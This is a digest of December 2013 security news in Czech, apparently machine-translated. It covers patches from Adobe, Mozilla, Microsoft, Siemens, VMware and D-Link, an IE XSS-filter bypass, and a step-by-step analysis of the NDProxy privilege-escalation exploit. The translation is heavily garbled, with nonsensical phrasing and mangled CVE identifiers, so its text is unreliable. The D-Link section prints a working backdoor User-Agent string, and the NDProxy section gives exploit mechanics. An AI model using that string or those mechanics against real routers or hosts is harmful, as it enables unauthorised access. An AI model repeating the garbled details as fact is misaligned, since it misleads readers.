Microsoft také vyslali zpravodaje , který odebere digitální podpisy pro devět soukromých, UEFI moduly třetích stran pro Windows 8 a Windows Server 2012 strojů. Tyto moduly by být načten během Secure Boot UEFI, pokud je povolen.


Adobe Lodě Patche pro Flash, Shockwave přehrávače
11.12.2013 Zranitelnosti

Adobe zveřejnila dva bulletiny zabezpečení dnes, řešení pár slabých míst v obou Shockwave a Flash Player.

Tato aktualizace zabezpečení Shockwave platí pro verze 12.0.6.147 a starších na Windows a Mac OS X a řeší pár korupce paměti zranitelnosti (CVE-2013-5.333 a CVE-2013 až 5334), které by mohly dát útočník možnost spuštění kódu na dálku . Adobe udělena tato chyba prioritní rating 1, což znamená, že útočníci jsou to pravděpodobně cílení - nebo brzy bude to cílení - ve volné přírodě.

Adobe také vytlačila aktualizace zabezpečení pro verzi 11.9.900.152 a starších jeho Flash Player pro Windows a Mac OS X a pro verze 11.2.202.327 a starší pro linuxové systémy. Aktualizace řeší typu zmatenost zranitelnost (CVE-2013-5331) a poškození paměti zranitelnost (CVE-2013 až 5332), z nichž každá by mohla umožnit vzdálené spuštění kódu, což způsobuje pády, a případně dávat kontrolu útočníka postižených strojích.

"Adobe si je vědoma zpráv, které exploit, jejichž cílem je přimět uživatele k otevření dokumentu aplikace Microsoft Word s nebezpečným Flash (. Swf) Obsah existuje CVE-2013-5331," říká Adobe v bulletinu oznámení. "Adobe Flash Player 11.6 a novější poskytnout zmírnění proti tomuto útoku."

Adobe se doporučuje, aby uživatelé následující:

Uživatelé aplikace Adobe Flash Player 11.9.900.152 a starších verzích pro Windows a Macintosh by měl provést aktualizaci na verzi Adobe Flash Player 11.9.900.170.
Uživatelé aplikace Adobe Flash Player 11.2.202.327 a starších verzích pro Linux by měl provést aktualizaci na verzi Adobe Flash Player 11.2.202.332.
Adobe Flash Player 11.9.900.152 nainstalován Google Chrome bude automaticky aktualizován na nejnovější verzi Google Chrome, který bude obsahovat Adobe Flash Player 11.9.900.170 pro Windows, Macintosh a Linux.
Adobe Flash Player 11.9.900.152 nainstalován s aplikací Internet Explorer 10 bude automaticky aktualizován na nejnovější Internet Explorer 10 verze, která bude obsahovat Adobe Flash Player 11.9.900.170 pro Windows 8.0
Adobe Flash Player 11.9.900.152 nainstalován s aplikací Internet Explorer 11 bude automaticky aktualizován na nejnovější Internet Explorer 11 verze, která bude obsahovat Adobe Flash Player 11.9.900.170 pro Windows 8.1
Uživatelé Adobe AIR 3.9.0.1210 a starších verzích pro Windows a Macintosh by měli aktualizovat na verzi Adobe AIR 3.9.0.1380.
Uživatelé Adobe AIR 3.9.0.1210 a starších verzích pro Android by měl aktualizovat na verzi Adobe AIR 3.9.0.1380.
Uživatelé Adobe AIR 3.9.0.1210 SDK a starších verzích by měl provést aktualizaci na Adobe AIR 3.9.0.1380 SDK.
Uživatelé Adobe AIR 3.9.0.1210 SDK a kompilátoru a dřívějších verzích by měl provést aktualizaci na Adobe AIR 3.9.0.1380 SDK a překladače.
Adobe zvažuje Flash chyby ve Windows a Mac OS X nejvyšší prioritu, zatímco Linux Flash chyba a zranitelnosti Adobe Air jsou přijímání pouze prioritní rating tří, což znamená, že je nepravděpodobné, že útočníci se zaměří na tyto chyby.
Adobe uznává Liangliang Song a Honggang Ren z Fortinet pro nalezení Shockwave chyby a David D. Rude II iDefense Labs Attila Suszter z couvání na Windows blogu pro nalezení Flash chyby.


Firefox 26 Dělá Java Pluginy Click-to-Play, oprav 14 bezpečnostní chyby
11.12.2013 Zranitelnosti

Mozilla vydala významnou novou verzi Firefoxu, která obsahuje opravy pro více než tucet chyb zabezpečení, stejně jako významnou změnu, která dělá vše Java pluginy click-to-play je výchozí. Tato funkce zabraňuje ty pluginy od spuštění automaticky na webových stránkách, které pomáhá chránit uživatele před některými webovými útoky.

Změna způsobu, jakým Firefox 26 zachází s pluginy je významným bezpečnostním přínosem pro uživatele, zejména ty, kteří nemusí být vědomi bezpečnostních problémů, které pluginy mohou způsobit. Útočníci se bude používat zabezpečení v pluginů, jako je Java, Flash nebo Silverlight kompromisy uživatelům, kteří navštíví web, který obsahuje obsah, který je automaticky poskytovaných těmito příponami. Mozilla začal proces změnou způsobu, jakým zachází Firefox pluginy na začátku tohoto roku, ale toto je poprvé, kdy tato změna ukázala až v konečné verzi prohlížeče.

"I přesto, že mnozí uživatelé nejsou ani vědomi pluginů, které jsou významným zdrojem visí, pády, a bezpečnostních incidentů. Tím umožňuje uživatelům rozhodnout, které stránky je třeba použít pluginy, Firefox pomáhají chránit a udržovat svůj prohlížeč běží hladce, " Mozilla Benjamin Smedberg uvedl již dříve letos na podzim o připravované změně Firefoxu manipulaci pluginů.

Java byla zejména oblíbenou útočníků v posledních letech, díky dlouhým ocasem bezpečnostních otázek a všudypřítomnosti na webu. Tvorba všechny Java pluginy click-to-play znamená, že uživatelé budou nyní muset explicitně zvolit hrát plugin kdykoliv se setkají s jedním. Ostatní prohlížeče, jako je Google Chrome, dává uživatelům možnost umožňuje click-to-play, stejně.

Kromě změny plugin chování, Firefox 26 má také záplaty pro řadu slabých míst, včetně pěti kritických ty. Hlavní oprava v novém prohlížeči je Mozilla aktivně zrušení důvěra ve střední certifikátem vydaným Agence Nationale de la Sécurité des Systèmes d'informace ve Francii. Certifikát byl používán k vydávání certifikátů pro několik domén Google omylem. Vědci Google zjištěn problém a odvolává důvěru pro potvrzení, jakož i, a oznámí jiných dodavatelů prohlížeče. Mozilla úředníků řekl, že nevěří, že chyba dát každému uživateli v nebezpečí, mimo síť certifikační autority je.

"Intermediate certifikát, který se používá pro MITM umožňuje držiteli certifikátu dešifrovat a sledovat komunikaci v rámci své sítě mezi uživatelem a libovolné webové stránky, aniž by varování prohlížeče se spustí. Útočník vyzbrojený podvodné SSL certifikát a schopnost ovládat síť jejich oběti mohly vydávat webových stránek takovým způsobem, že by bylo nezjistitelné pro většinu uživatelů. Tyto certifikáty by mohly klamat uživatele na důvěře internetových stránkách uvedených pocházejí od majitele domény, ale ve skutečnosti obsahuje nebezpečný obsah nebo software. Věříme, že tato instance MITM byl omezen na vnitřní síti podřízených CA, " Kathleen Wilson Mozilla řekl.

Mezi další bezpečnostní opravy ve Firefoxu 26 patří:

MFSA 2013-116 informace JPEG úniku

MFSA 2013-115 GetElementIC zadané pole pahýly mohou být generovány mimo dodržovat typesets

MFSA 2013-114 Use-po-zdarma syntetického pohybu myši

MFSA 2013-113 Nastavení zabezpečení pro vestavěné kořeny ignorovány během ověření certifikátu EV

MFSA 2013-112 Linux Informace schránky zpřístupnění když výběr pasta

MFSA 2013-111 porušení segmentace při výměně objednané prvky seznamu

MFSA 2013-110 Potenciální přetečení JavaScript binární vyhledávací algoritmy

MFSA 2013-109 Use-po-free v tabulce střihu

MFSA 2013-108 Use-po-zdarma posluchačů událostí

MFSA 2013-107 omezení Sandbox nevztahuje na vnořený objekt prvky

MFSA 2013-106 Kódování znaků cross-původ XSS útok

MFSA 2013-105 Instalace aplikace doorhanger trvá na navigaci

MFSA 2013-104 bezpečnostní Různé paměti nebezpečí (rv: 26.0 / rv: 24.2)


Microsoft Updates 12. 2013 - Vyspravování kritické 0 dnů Exploited v přírodě
11.12.2013 Zranitelnosti

Osm Microsoft Security Bulletiny jsou vytlačeny tento měsíc, MS13-096 až MS13-106. Pět z nich je hodnocena jako "kritické" a dalších šest hodnocena jako "Důležité". Mezi hlavní priority pro zavádění tohoto měsíce jsou kritické GDI + (MS13-096), Internet Explorer (MS13-097), a Scripting Runtime (MS13-099) aktualizace.

Několik zranitelností byly aktivně využívány v rámci cílených útoků po celém světě, a jeden z nich je známo, že se ITW po dobu nejméně šesti měsíců, nebo tak.

Korupce GDI + aktualizace záplaty paměti zranitelnost CVE-2013-3906, které byly detekce jako Exploit.Win32.CVE-2013-3906.a . Viděli jsme, nízký počet variací ITW o zneužití této chyby zabezpečení jako chybně soubor TIFF, všechny svržení zadní vrátka, jako je Citadela, na BlackEnergy bot, PlugX, Taidoor, Janicab, Solar, a Hannoveru. Cílový profil a distribuce sada nástrojů souvislosti s těmito využívat pokusy naznačují širokou škálu pravděpodobných aktérů hrozeb, které dostal své ruce na to od července tohoto roku, a široký dosahující distribuční řetězec, který poskytl využívat po celém světě. S ohledem na různé použití a zdrojů, to jeden může nahradit CVE-2012-0158 jako součást cílených útoků z hlediska celkového objemu.

Následujte mě na Twitteru
Bulletin Internet Explorer opravuje sedm jiné zvýšení oprávnění a poškození paměti zranitelností, z nichž některý ovlivňuje Internet Explorer 6 v systému Windows XP SP 3 prostřednictvím aplikace Internet Explorer 11 v systému Windows Server 2012 R2 a Windows RT 8.1. Očekáváme, že využije pro některé z těchto chyb zabezpečení zahrnuté v komoditě využívat balení.

Konečně, existuje další kritické zranitelnosti v systému Windows Scripting Engine zatím další "použití po volný", který bohužel umožňuje vzdálené spuštění kódu přes všechny verze Windows venku a může být napadena prostřednictvím některého z běžných webových prohlížečů. Patch!

Tento příspěvek bude pravděpodobně třeba aktualizovat později dnes, ale do té doby, více o záplaty tento měsíc lze nalézt na stránkách společnosti Microsoft .


Adobe Bezpečnostní aktualizace prosinec 2013 - Upevňovací CVE-2013-5331 a další
11.12.2013 Zranitelnosti

Tento měsíc se společnosti Adobe realing opravy jak pro Flash Player a Shockwave.

V vulnerabilies pro Flash Player ovlivní všechny platformy a týkají dvou CVEs - CVE-2013-5331 a CVE-2013-5332, které oba umožňují vzdálené spuštění kódu. Eploitation z CVE-2013-5331 pomocí aplikace Microsoft Word jako pákový mechanismus byl pozorován v přírodě. Přestože Flash 11.6 představil click-to-Play pro sadu Office, uživatelé mohou být stále společensky konstruovány do chodu obsahu Flash v dokumentech sady Office. Ujistěte se, že použít tuto opravu ihned.

Druhý bulletin zabezpečení ovlivňuje Shockwave Player . Tato aktualizace opravuje CVE-2013-5333 a CVE-2013-5334, které oba mají maximální prioritu, neboť umožňují vzdálené spuštění kódu.

Útočníci doufají, že lidé budou čekat, až po prázdninách s platnými záplaty, když tam je méně personálu kolem. Patch nyní místo.


Microsoft v úterý vydá kritické opravy Windows, Office a IE

11.12.2013 Zranitelnosti
Celkový roční počet aktualizací bude o 28 % vyšší než loni. Microsoft minulý týden oznámil, že v rámci pravidelného aktualizačního druhého úterý v měsíci poskytne 11 aktualizací zabezpečení na opravu kritických chyb zabezpečení v systému Windows, aplikaci Internet Explorer (IE), sadě Office a serveru Exchange, včetně jedné, která by měla zabránit hojným útokům potvrzeným před měsícem.

S 11 aktualizacemi z 10. prosince dosáhne počet aktualizací společnosti Microsoft 106 za rok 2013, což vyrovnává rekord z roku 2010 a znamená 28% nárůst ve srovnání s rokem 2012.

Pět z aktualizací uvedených v upozornění na aktualizace má označení „kritická“, tedy nejvyšší stupeň na interním žebříčku Microsoftu, zbývajících šest mají označení „důležitá“, tedy o stupínek nižší.
„Ze všeho nejdříve je potřeba nainstalovat záplatu pro IE,“ řekl Andrew Storms, ředitel pro vývoj a provoz bezpečnostní společnosti CloudPassage se sídlem v San Francisku.

Kritická aktualizace IE se bude týkat všech aktuálně podporovaných verzí prohlížeče Microsoftu od stařičkého IE6 po nedávno vydaný IE11. Tato aktualizace mimo jiné znamená, že Microsoft v letošním roce svůj webový prohlížeč opravoval každý měsíc, zatímco do července loňského roku probíhaly aktualizace této aplikace s poloviční frekvencí, tedy jednou za dva měsíce.

Společnost bude muset podporovat hned šest verzí IE přinejmenším do dubna, kdy konečně odejde do důchodu IE6, který debutoval před více než 12 lety a který sklízí spíše posměch.

„To je daň za udržování zastaralého softwaru,“ konstatoval Storms. „Mám tím na mysli provozní náklady oddělení IT na správu a udržování hned několika verzí systému, ale stejně je na tom vlastně i Microsoft, který musí totéž dělat pro své zákazníky.“

Další důležitou aktualizaci bude záplata několika zranitelností v kombinaci verzí Windows a Office, která by měla zastavit pokračující útoky, které Microsoftu nahlásili výzkumníci společnosti McAfee na počátku listopadu. Microsoft vydal 5. listopadu informační zpravodaj zabezpečení, který hrozba popisuje a nabízí dočasnou opravu.

Další dvě kritické aktualizace se týkají systému Windows, zatímco poslední opravuje server Exchange, který je v podnicích hojně rozšířen jako hlavní poštovní server.

Storms zákazníkům doporučuje okamžitě nainstalovat důležité aktualizace systému Windows, s aktualizací pro Exhcange ale radí nespěchat.

Závažnost aktualizace serveru Exchange na jedné straně vyžaduje pozornost. Ale Storms zdůraznil, že rozhodnutí může být složitější, než se na první pohled zdá, protože oddělení IT se na konci roku raději do aktualizace e-mailových serverů nepouštějí.

„Riziko opravy a restartu serveru Exchange na konci roku jistě na poradách vyvolá žhavou debatu,“ řekl Storms, když odkázal na diskuse, které se strhnou při poradách o nutnosti aktualizací.

„Když budeme mít štěstí, zranitelnost Exchange bude v knihovnách Outside In od Oraclu a bude snáz opravitelná,“ dodal Storms.

Exchange využívá knihovny Outside In k zobrazení přiložených souborů místo jejich otvírání v aplikaci v cílovém počítači, jako je aplikace Microsoft Word. Microsoft tyto knihovny opravuje opakovaně, konkrétně letos dvakrát – naposledy v srpnu – a také dvakrát v roce 2012.

Aktualizace Outside In byla součástí sady oprav Oraclu v říjnu, takže je téměř jisté, že aktualizace pro Exchange bude řešit nejnovější chyby této sady knihoven. „S ohledem na způsob testování oprav v Microsoftu by to časově odpovídalo,“ souhlasil Storm.

Šest aktualizací označených jako důležité bude opravovat chyby zabezpečení v systému Windows, sadách Office 2010 a Office 2013, serveru SharePoint a serveru Visual Studio Team Foundation Server 2013.

Pokud nebudou provedeny, mohou kyberzločinci nakazit počítače malwarem, ukrást informace, získat další oprávnění, které jim umožní spustit nebezpečnější útoky, nebo obejít bezpečnostní prvky.

Společnost vydá aktualizace zabezpečení 10. prosince kolem 13:00 východního času, tedy zhruba v 19:00 středoevropského času.


Analýza Nový Windows Zero-Day eskalaci oprávnění Exploit 0

8.12.2013 Zranitelnosti

Nedávno jsme chytili škodlivý vzorek, který využívá zranitelnosti PDF-CVE-2013-3346, věříme, a vykoná po použití-po-free stav nastane. V naší analýze jsme zjistili, že tento vzorek PDF také využívá zero-day zranitelnost místní Windows-CVE-2013-5065-eskalovat privilegia. Tento zero-day se vyskytuje v NDProxy.sys pod Windows XP a 2003. Využití této chyby je podobná CVE-2010-2743, známý jako Win32k rozložení klávesnice zranitelnosti. Pojďme se blíže podívat.
Po PDF využít uspěje a shellcode spustí, vyplňuje první stránka v paměti, počínaje od adresy 0, se stovkami NOP instrukcí a pak vyplní s jádrem shell kód. Dále se dostane rukojeť \ \. \ NDProxy přes API CreateFileA, a pak používá tento popisovač voláním API DeviceIoControl s IOCTL kód 0x8fff23c8. Další provedení chyba přejde do PxIoDispatch funkce v Ring 0 NDProxy!. (PxIoDispatch je funkce, která zpracovává kontrolu vstupů a výstupů přicházející z uživatelského režimu.) 20131206 PDF využít 1
Zatímco příchod na pobočce, která zpracovává IOCTL kód 0x8fff23c8, PxIoDispatch zpracovává vstupní vyrovnávací paměti dodaný útočník:
20131206 PDF využívat 2
ESI registr ukazuje na vstupní vyrovnávací paměti pocházející z uživatelského režimu, a obsah vstupního bufferu je stanovena takto:
20131206 PDF využít 3
Po výpočtu, hodnota eax je (0 × 7030125-0 × 7030101) * 3 * 4 = 0x1b0, který bude použit jako index do tabulky funkcí později:
20131206 PDF využít 4
Nyní zranitelnosti: Uvidíme, jak dlouho tabulková funkce je, že bydlí na off_18008. Začátek tabulky:
20131206 PDF využít 5
Konec tabulky:
20131206 PDF využít 6
Konec offset, 0x181b0, minus ofset, 0 × 18008, nám dává 0x1a8. V našem případě index je 0x1b0, která je již z tabulky, a odkazuje na druhé položce DWORD u vedlejšího stolu, s hodnotou 0 × 38. Takže provedení chyba teď jde řešit 0 × 38 díky instrukcí volání, a vše je pod kontrolou útočníka.
V shell kódu jádra, využívat nahradí současný proces "žeton s SYSTEM procesu" znamení, která by měla vystupňovat svou čest, jak systém a návrat k volajícímu. Nyní Následující uživatel režim shellcode poběží na privilegované úrovni. Využití pak klesne dočasný soubor s náhodným jménem, ​​jako xxx.tmp, Trojan, v dočasném adresáři, a uvádí jej voláním API WinExec.
Díky mým kolegům Vinay Karecha, Bing Sun, a Lijun Cheng za jejich podporu a pomoc při této analýze.


Siemens Záplaty Authentication Bypass Chyba v SINAMICS ICS Software
6.12.2013 Zranitelnosti

Siemens oprava vážné vzdáleně zneužít zranitelnost ve svém softwaru SINAMICS S / G IKS, která by mohla umožnit útočníkovi, aby se libovolné akce na zranitelné instalaci, aniž byste museli ověřit.

Tato chyba ovlivňuje všechny verze produktů Siemens Sinamics S / G s verzí firmware starší než 4.6.11. ICS-CERT, pat z ministerstva pro vnitřní bezpečnost, řekl v poradní, že si není vědoma jakéhokoliv veřejnosti využívat pokusy proti této vady, ale to není důvod odkládat záplatování. Ověřování bypass zranitelnosti pro produkt, např. SINAMICS S / G, který je používán pro řízení operace disků v průmyslových zařízeních, může být velmi užitečným nástrojem pro útočníka.

"Siemens identifikoval ověřovací bypass zranitelnost v produktové řady SINAMICS S / G. Siemens vyrábí aktualizaci firmware, která snižuje riziko zneužití této zranitelnosti a byl testován aktualizaci ověřit, že řeší chyby zabezpečení. Využití této chyby zabezpečení by mohla umožnit útočníkovi přístup k administrativní funkce přístroje bez ověření, " poradní ICS-CERT říká.

"Postiženy produkt, SINAMICS S / G rodiny, se používá k ovládání různých pohonů, a to zejména ve strojírenství a investiční výstavby. Kromě toho, SINAMICS S / G rodina spolupracuje s řízení pohybu, které se používají ke koordinaci synchronních operací nebo složitých technologických funkcí. "

Tato chyba je považována za poměrně snadno zneužít, a Siemens uvedl, že organizace, které jsou spuštěny zranitelné verze softwaru by měli nainstalovat aktualizovaný firmware, verze 4.6.11 a 4.7. Společnost rovněž doporučuje, aby zákazníci neposkytuje přístup veřejnosti k SINAMICS rozhraní po síti.

"Jako obecné bezpečnostní opatření Siemens důrazně doporučuje, chránit přístup k rozhraní SINAMICS S / G sítě s příslušnými mechanismy. Je doporučeno dodržovat doporučené postupy zabezpečení a nakonfigurovat prostředí v souladu s provozními pokyny, aby ke spuštění zařízení v chráněném prostředí IT, "Siemens poradní říká.


Microsoft Chcete Patch TIFF Zero Day; Počkejte Til Příští rok pro XP Zero

6.12.2013 Zranitelnosti
Microsoft bude příští týden, zalátat zero-day zranitelnost ve svém GDI + grafické komponenty jsou využívány v cílených útoků na Blízkém východě a Asii.

Zero den seděl unpatched, protože byla zveřejněna 5.listopadu, Microsoft se uvolnit nástroj Fixit jako dočasné zmírnění. Náplast je jedním z 11 bulletinů Microsoft dnes uvedl, že se uvolní v rámci svých 12. 2013 aktualizace zabezpečení Patch Tuesday , pět z bulletinů bude kritický stupeň závažnosti.

Microsoft se potvrdí, nicméně, že nula den v ovladači NDProxy , který spravuje Microsoft Telephony API v systémech Windows XP, nebude oprava. Že nula den je také využívána v přírodě spolu s PDF využít z záplatované Adobe Reader chyby.

GDI + zranitelnost se nachází v několika verzích Windows a Office a umožňuje útočníkovi získat vzdálené spuštění kódu, ale pouze na Windows Vista, Windows Server 2008 a Office 2003 do roku 2010. Existuje chyba zabezpečení ve způsobu, jakým rozhraní GDI + návleky rukojetí obrázky ve formátu TIFF. Microsoft uvedl, že by útočník musel lákat oběti náhledu nebo otevřít škodlivý přílohy ve formátu TIFF nebo navštívit webové stránky hosting využít obraz.

Kritické záplaty Úterní řešení vzdálené spuštění kódu zranitelností v řadě produktů společnosti Microsoft, včetně nejen Windows a Office, ale Lync, Internet Explorer a Exchange. Chyby zabezpečení ve službě SharePoint, Lync, SingnalR a ASP.NET jsou mezi těmi hodnocené důležité Microsoft. Tyto chyby zabezpečení jsou především zvýhodněné otázky eskalace, stejně jako zpřístupnění informací chyba.

To bude poslední plánované vydání bezpečnostní aktualizace od společnosti Microsoft za rok. Vypadá to, že úterní aktualizace přinese počet 2013 na 106 bulletiny, ostře od 83. loňského roku, podle Qualys ČTÚ Wolfgang Kandek. Microsoft měl v podobných čísla bulletinu v roce 2011 (100) a 2010 (106).

"Co se týče 0-dnů, Microsoft dvůr soustavně upozorňuje na to, že dodatečná bezpečnostní toolkit EMET (Enhanced Mitigation Experience Toolkit) je účinná proti všem 0-day problémy v letošním roce," řekl Kandek. "Věříme, že je aktivní bezpečnostní opatření, která organizace by měla vyhodnotit a zvážit, jako další vrstvu ve svých obranných opatření."

XP zero-day, mezitím, bude pravděpodobně odešel do ledna 2014 Patch Tuesday aktualizace. Tato chyba zabezpečení je zvýšení úrovně oprávnění zranitelnost a umožňuje přístup jádra.

Vědci FireEye řekl, že našel využití ve volné přírodě používán spolu PDF založené na využití proti opravenou Adobe Reader zranitelnosti. Reader verze 9.5.4, 10.1.6, 11.0.02 a dříve na XP SP3 jsou ovlivněny, novější verze nejsou, FireEye řekl a dodal, že toto využití umožňuje lokální uživatel možnost spuštění kódu v jádře, jako je například instalace nového software, manipulovat s daty, nebo vytvářet nové účty. Využít nelze použít na dálku, uvedla firma.

Společnost Microsoft doporučuje odstranění ovladače NDProxy.sys jako řešení, zmírnění, nicméně, bude mít vliv TAPI operace.

"Správci systému Všude musí být provedeny zlobivé seznam Microsoftu, protože tento svátek" dar "je jednoznačně kus uhlí," řekl Tyler Reguly, technický ředitel bezpečnostního výzkumu a vývoje v Tripwire. "Microsoft je balil 2013 záplat sezónu s čímkoli, co bylo, kterým se kolem sebe. Někdo by měl říct, Microsoft zapomněli zahrnout dřezu. "


VMware Záplaty Privilege eskalace Chyba zabezpečení
5.12.2013 Zranitelnost

Virtualizační software VMware společnost vytlačila záplaty pro některé sestavení svých produktů Workstation, Fusion, ESXi a ESX tento týden, stanovení zranitelnosti, které by vedly ke zvýšení úrovně oprávnění ve starších operačních systémech Windows běží ve virtuálním prostředí.

Hlavním problémem je způsob, Workstation, ESX a Fusion zpracovat kontrolní kód v ovladači LGTOSYNC.sys. Pokud útočník zadlužuje chybu zabezpečení v této ovladače mohli manipulovat přidělení paměti, a dát uživatelům běžící software na 32-bitových systémech s operačním systémem Windows 2000 Server, Windows XP nebo Windows 2003 na riziku. ESXi je tangenciálně zranitelné v případě nasazení systému Windows 2000 Server, Windows XP nebo Windows 2003 Server.

"Tato chyba zabezpečení neumožňuje zvýšení úrovně oprávnění z hostovaném operačním systému hostitele," VMware je uvedeno v poradním včera, "To znamená, že hostitelský paměť nelze manipulovat z hostovaného operačního systému."

Bezpečnostní poradenství dodává, že verze Workstation od 9.x před 9.0.3, přehrávač od 5.x před 5.0.3, Fusion od 5.x až 5.0.4, ESXi 4.0, 4.1, 5.0, 5.1 a ESX 4.0 a 4.1 jsou ovlivněny.

Všechny zranitelných produktů jsou více či méně součástí VMware Infrastructure Suite společnosti. VMware Fusion je technicky označován jako software hypervisor, který umožňuje Intel-založené Macintoshe ke spuštění systému Windows, Linux a další operační systémy podél OS X, zatímco pracovní stanice má stejnou funkcionalitu jako Fusion, je to jen specializovaný na x64 počítačích se systémem Windows, Linux nebo BSD.

Je to druhé úrovně oprávnění zranitelnost záplatované VMware v posledních třech týdnech. Společnost také opravena podobný problém ve Workstation, zejména verzi, která běží Linux, zpět v listopadu.

VMware zveřejněny patche pro všechny produkty zapletený včera na sekci podpory svých stránkách a za obvyklé, poslal bezpečnostních upozornění e-mailem a v příspěvku na úplné zveřejnění seznamu "je.


Bypass Internet Explorer Cross-Site Scripting Filtr možné
5.12.2013 Zranitelnost

Slabost byla objevena v reflexní cross-site scripting filtru současné době v aplikaci Internet Explorer od IE 8, které by mohly umožnit útočníkovi trik prohlížeč na provádění škodlivého kódu jako důvěryhodné. Problém do budoucna je dvojí: vše vyskytující se v metodě bypass je přijat jako součást oficiálního standardu HTML sahající nejméně 15 let, a Microsoft řekl, že nebude pracovat na opravu pro chybu.

Carlos Munoz, výzkumník s WhiteHat Elektronika Kdo propagoval problém dnes, řekl Threatpost, že hlásil problém s Microsoft Security Response Center 26. srpna a po několika back-a-dále e-mailů byl informován, že Microsoft by se pohnout kupředu citací filozofie designu pro XSS filtr.

Žádost o komentář k Microsoft nebyl vrácen včas ke zveřejnění.

Konkrétně Microsoft ukázal Munoz k odrážky v jeho filozofii designu, který uvádí: "Pro útoky, které jsou závislé na proměnách aplikaci, se pokusíme jen proto, aby XSS filtr efektivní, pokud jsou tyto transformace označeny být všudypřítomná. Zvolíme ne ROT13 dekódování adresy :-)URL. "

Munoz uvedl, že pokud Microsoft udělal rozhodnete problém vyřešit, může to mít pro přidání funkcí do filtru, který uznává zakódované odrazy, dekóduje je a pak porovnává ty decodings známých potenciálně škodlivých podpisy.

"Další cesta, že Microsoft by mohl mít sleduje injekce na několik žádostí a snaží se zjistit, zda injekce na straně 1 z internetových stránek se nakonec odráží jako škodlivý skript na straně 4," řekl Munoz. "Existuje pravděpodobně několik dalších cest, které společnost Microsoft mohla sledují při práci na oprava této chyby."

Microsoft představil reflexní cross-site scripting filtr v aplikaci Internet Explorer 8 a je podporována v každé verzi prohlížeče pomocí aktuální verze 11 propuštěn před dvěma měsíci s Windows 8.1. Filtr zabraňuje prohlížeče z provádění non-uložené údaje předložené ve formě HTML nebo v dotazu HTTP, aniž by nejprve dezinfekce ji.

Filtr, ale má slabost v tom, že může být nastrčen provedení nedůvěryhodné požadavky od uživatele, útočník by mohl zneužít tuto situaci spouštět škodlivý javascript nebo VBScript uvnitř prohlížeči. Četné útoky high-profil jen letos využili problémy javascript s aplikací Internet Explorer. Společnost Microsoft vydala téměř měsíční kumulativní IE záplaty pro prohlížeče v roce 2013.

"V současné době je tato metoda obchází Internet Explorer anti-XSS filtr funguje pouze tehdy, když útočník může aplikovat do nebo vytvořit vlastní atribut prostor elementu HTML, a že atribut je pak předán na stránku ve stejné doméně, která obsahuje XSS zranitelnost, "řekl Munoz. "Jako by to znamenalo, že to není" všechno je zranitelný "druh najít. Je to však něco, co by mohly být využity na téměř libovolné stránce, kde útočník může aplikovat prvky HTML, byť s požadavkem, že oběť bude muset klepnout na odkaz na stránce. "

Munoz napsal na svém blogu, že dnes filtr porovnává pouze nedůvěryhodné požadavky s tělem odezvy z webové stránky pro odrazy, které by mohly způsobit spuštění kódu.

"Pokud injekce od té původní žádost odráží na stránce nezpůsobí okamžitou JavaScript spuštění kódu, který nedůvěryhodné údaje z injekce je pak označen jako důvěryhodné údaje, a anti-XSS filtr nebude kontrolovat ji v budoucích požadavků, "řekl Munoz, s tím, že pouze nedůvěryhodný data odeslána přes filtr.

Munoz poukazuje na to, že filtr je účinný při zastavení cross-site scripting útoky, ale útočník mohl oklamat tím, že využívají skuliny ve standardu HTML s ohledem na desetinná a hexadecimální kódování.

"Všechno, co používá v této metodiky je součástí oficiálního HTML standardního to používá webové způsob, jakým web byl chtěl být," řekl Munoz. Když je reakce provedena HTTP požadavku, který obsahuje správně kódovaný desítkové nebo šestnáctkové charakter Munoz uvedl, prohlížeč zobrazí kódovaný znak.

"Jako bonus pro útočníka, když je desítkové nebo šestnáctkové zakódovaný znak vrátil v atributu, který je pak součástí následné žádosti, je dekódovaný znak, který je odeslán, není desítkové nebo šestnáctkové kódování tohoto charakteru," napsal Munoz. "Tak, všichni útočník musí udělat, je zmást Internet Explorer proti XSS filtr tím, že přiměje některé z požadovaných znaků, které se projeví jako jejich desítkové nebo šestnáctkové kódování v atributu."

Munoz že takový útok může být proveden s nebezpečným iframe škodlivého kódu v podání formuláře nebo vložený odkaz na web hosting zneužít. Dodal, že si není vědom žádných in-the-wild využije. Útočník by mohl sestavit něco podobného na společné reflexní XSS útoku obejít filtr, ale bude muset lákat uživatele přes phishing e-mailem na zemi na místě, hosting zneužít.

"Jakmile oběť následovat odkaz, škodlivý JavaScript poběží ve svém prohlížeči v kontextu zranitelné webové stránky," řekl Munoz. "To by mohlo vést k něčemu od zachycení relace tokeny, na obcházení Cross Site Request padělání ochrany, k využití Internet Explorer specifických 0-dní ohrozit počítač oběti."


D-Link záplaty Backdoor v routerech

3.12.2013 Hardware | Zranitelnosti

D-Link má oprava backdoor dárek v řadě svých směrovačů, která byla zveřejněna před necelými dvěma měsíci a mohla útočníkovi umožnit vzdáleně přistupovat administrativní panel na hardware, spustit kód a provést libovolný počet změn.

Den díkůvzdání přehlídka oprava řeší problém v řadě postižených směrovačů, většina z nich se staršími verzemi, které jsou stále v oběhu a do značné míry nedotčené spotřebitelů zejména.

Účastnické zařízení , jako jsou bezdrátové směrovače, Modemy a ostatní set-top zařízení představují skutečný problém zabezpečení, protože opravy vyžaduje aktualizaci firmwaru, které jsou často ignorovány. Je tu spousta výzkumu také, že zkoumá rizika, která představují nejen kočárku routery, ale jiné domácnosti a malé firmy síťové zařízení.

S využitím dostupných nástrojů a on-line vyhledávačů, jako je Shodan, snadno útočníci mohou najít na Internetu čelí vybavení, které je zranitelné, a zaměřit se na ty krabice s libovolným počtem využije nebo skriptů se zaměřením na slabých nebo výchozí pověření, takže někdo vzdálený přístup k zařízení.

Problém D-Link je mnohem závažnější vzhledem k přístupu, že si může dovolit vzdálenému útočníkovi. Výzkumník Craig Heffner hlášeny najít chybu v říjnu, řekl, že útočník používá určitý řetězec "xmlset_roodkcableoj28840ybtide" by přístup k webovému rozhraní řady různých směrovačů D-Link bez pověření.

D-Link směrovače DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604 + a TM-G5240, spolu s Planex routery BRL-04R, BRL-04UR a BRL -04CW také použít stejný firmware, řekl Heffner. Revize firmwaru vydané minulý čtvrtek jsou pro DI-524, DI-524UP, DIR 100 a DIR-120 routery D-Link uvedl ve svém poradenství.

"Různé routery D-Link umožňuje administrativním interetové akce, pokud žádost HTTP obsahuje zvláštní User-Agent řetězec," řekl originální poradenské společnosti. "Tento backdoor umožňuje útočníkovi obejít autentizaci heslem a přístup k administrativní webové rozhraní routeru."

